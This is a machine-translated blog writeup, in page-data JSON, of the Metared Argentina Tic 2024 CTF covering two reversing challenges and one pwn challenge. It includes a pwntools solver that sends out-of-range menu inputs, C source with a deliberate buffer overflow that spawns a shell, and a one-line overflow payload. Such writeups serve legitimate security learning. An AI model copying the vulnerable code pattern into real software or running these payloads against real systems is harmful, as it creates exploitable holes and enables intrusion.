{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-metared-argentina-tic-2024-en","result":{"data":{"markdownRemark":{"id":"11ced4aa-d508-5250-aab4-4deba7f1148e","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-metared-argentina-tic-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in a CTF called Metared Argentina Tic 2024.</p>\n<p>There was almost no Rev, and the Pwn server kept going down, so it was not a very fun CTF, but I will still jot down a quick writeup.</p>\n<h2 id=\"baby-rev-rev\" style=\"position:relative;\"><a href=\"#baby-rev-rev\" aria-label=\"baby rev rev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Baby rev (Rev)</h2>\n<blockquote>\n<p>Meet my expectations to get the flag</p>\n</blockquote>\n<p>Analyzing the binary showed that it tries to create a file at <code class=\"language-text\">/tmp/superSecretDirectory/SuperDuperSecretFlag.txt</code>.</p>\n<p>After creating the <code class=\"language-text\">superSecretDirectory</code> directory and running the program, I was able to obtain the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c1d9f51f9d93a69eed17f1f01e96f636/bb3b7/image-20241108202617509.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    
class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 23.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6ElEQVQY032NbW+DIBRGETGTFy0iUNF167opapf9/3/3DGmyZMmyDyeH3HDPJZdbwOU6wvoB19sHtvsX5rhhXtYfL+ueWbfEGhMr9n3Hft+zY1wwz3NyBAlRQvYMygQ0fUBrJ5zcM1r3sNQuz/X5FXaY4JzFEAaMY4D3LuGhtYaUEkIIkLdPnxYFRNunZQvVeagUOULHmzcd5Mk+jukexnQ52LYNOK8THEqpzBEl07uBHTXO0wuMG1LYgCuNOnH4STSo5Skf5LJBURDQkoIx9ieEVRQlOz5UyRUKWv6moNm0ZMkUhJB/+QZRjnesq1ZBxAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c1d9f51f9d93a69eed17f1f01e96f636/8ac56/image-20241108202617509.webp 240w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/d3be9/image-20241108202617509.webp 480w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/e46b2/image-20241108202617509.webp 960w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/52f78/image-20241108202617509.webp 1211w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c1d9f51f9d93a69eed17f1f01e96f636/8ff5a/image-20241108202617509.png 240w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/e85cb/image-20241108202617509.png 480w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/d9199/image-20241108202617509.png 960w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/bb3b7/image-20241108202617509.png 1211w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c1d9f51f9d93a69eed17f1f01e96f636/d9199/image-20241108202617509.png\"\n            alt=\"image-20241108202617509\"\n            title=\"image-20241108202617509\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"poke-2-can-you-defeat-gary-rev\" style=\"position:relative;\"><a href=\"#poke-2-can-you-defeat-gary-rev\" aria-label=\"poke 2 can you defeat gary rev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Poke 2: Can you defeat Gary? (Rev)</h2>\n<p>It looks like you can get the flag by winning the Pokémon battle, but if you just enter commands normally, the opponent is far too strong to beat.</p>\n<p>However, if you use item number 5 on number 7, which does not exist in the menu choices, you can win the battle.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 852px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/767ac030d3464efaee053a40f9341ddd/47ff6/image-20241108210729888.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 96.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/767ac030d3464efaee053a40f9341ddd/8ac56/image-20241108210729888.webp 
240w,\n/static/767ac030d3464efaee053a40f9341ddd/d3be9/image-20241108210729888.webp 480w,\n/static/767ac030d3464efaee053a40f9341ddd/39392/image-20241108210729888.webp 852w\"\n              sizes=\"(max-width: 852px) 100vw, 852px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/767ac030d3464efaee053a40f9341ddd/8ff5a/image-20241108210729888.png 240w,\n/static/767ac030d3464efaee053a40f9341ddd/e85cb/image-20241108210729888.png 480w,\n/static/767ac030d3464efaee053a40f9341ddd/47ff6/image-20241108210729888.png 852w\"\n            sizes=\"(max-width: 852px) 100vw, 852px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/767ac030d3464efaee053a40f9341ddd/47ff6/image-20241108210729888.png\"\n            alt=\"image-20241108210729888\"\n            title=\"image-20241108210729888\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I was able to get the flag with the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\ncontext<span 
class=\"token punctuation\">.</span>terminal <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"/mnt/c/Windows/system32/cmd.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"/c\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"start\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wt.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-w\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"0\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"sp\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".75\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-d\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wsl.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'-d'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Ubuntu\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"bash\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-c\"</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./pokemaster\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span 
class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token comment\"># GDB commands to run at start; empty string added here so the gdb branch below has a defined value</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"pokemaster.ctf.cert.unlp.edu.ar\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">35001</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n    <span class=\"token comment\"># target = process(TARGET_PATH)</span>\n\n<span class=\"token comment\"># Exploit: choose item 5 and use it on slot 7, which is not offered in the menu</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"3\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"5\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"7\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish 
exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"warmup-pwn\" style=\"position:relative;\"><a href=\"#warmup-pwn\" aria-label=\"warmup pwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Warmup (Pwn)</h2>\n<p>The following source code is provided.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token comment\">// gcc -Wall -fno-stack-protector -z execstack -no-pie -o reto reto.c</span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/types.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token 
string\">&lt;stdio.h></span></span>\n \n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n \n  <span class=\"token keyword\">int</span> var<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> check <span class=\"token operator\">=</span> <span class=\"token number\">0x12345678</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">20</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n \n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span><span class=\"token number\">45</span><span class=\"token punctuation\">,</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n \n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"\\n[buf]: %s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[check] %p\\n\"</span><span class=\"token punctuation\">,</span> check<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n \n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>check <span class=\"token operator\">!=</span> <span class=\"token number\">0x12345678</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token punctuation\">(</span>check 
<span class=\"token operator\">!=</span> <span class=\"token number\">0x54524543</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">printf</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"\\nClooosse!\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n \n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>check <span class=\"token operator\">==</span> <span class=\"token number\">0x54524543</span><span class=\"token punctuation\">)</span>\n   <span class=\"token punctuation\">{</span>\n     <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Yeah!! You win!\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n     <span class=\"token function\">setreuid</span><span class=\"token punctuation\">(</span><span class=\"token function\">geteuid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token function\">geteuid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n     <span class=\"token function\">system</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/bin/bash\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n     <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Byee!\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n   <span class=\"token punctuation\">}</span>\n   <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token 
punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>A simple exploit like the following worked. (The server was still down even after 12 hours, so I did not obtain the flag…)</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token builtin class-name\">echo</span> -e <span class=\"token string\">\"AAAAAAAAAAAAAAAAAAAAAAAAAAAACERT\"</span> <span class=\"token operator\">|</span> ./reto</code></pre></div>","fields":{"slug":"/ctf-metared-argentina-tic-2024-en","tagSlugs":["/tag/ctf-en/","/tag/rev-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-11-19","description":"A writeup for Metared Argentina Tic 2024.","tags":["CTF (en)","Rev (en)","Pwn (en)","English"],"title":"Metared Argentina Tic 2024 Writeup","socialImage":{"publicURL":"/static/894b620141381318529941e47448a923/ctf-metared-argentina-tic-2024.png"}}}},"pageContext":{"slug":"/ctf-metared-argentina-tic-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}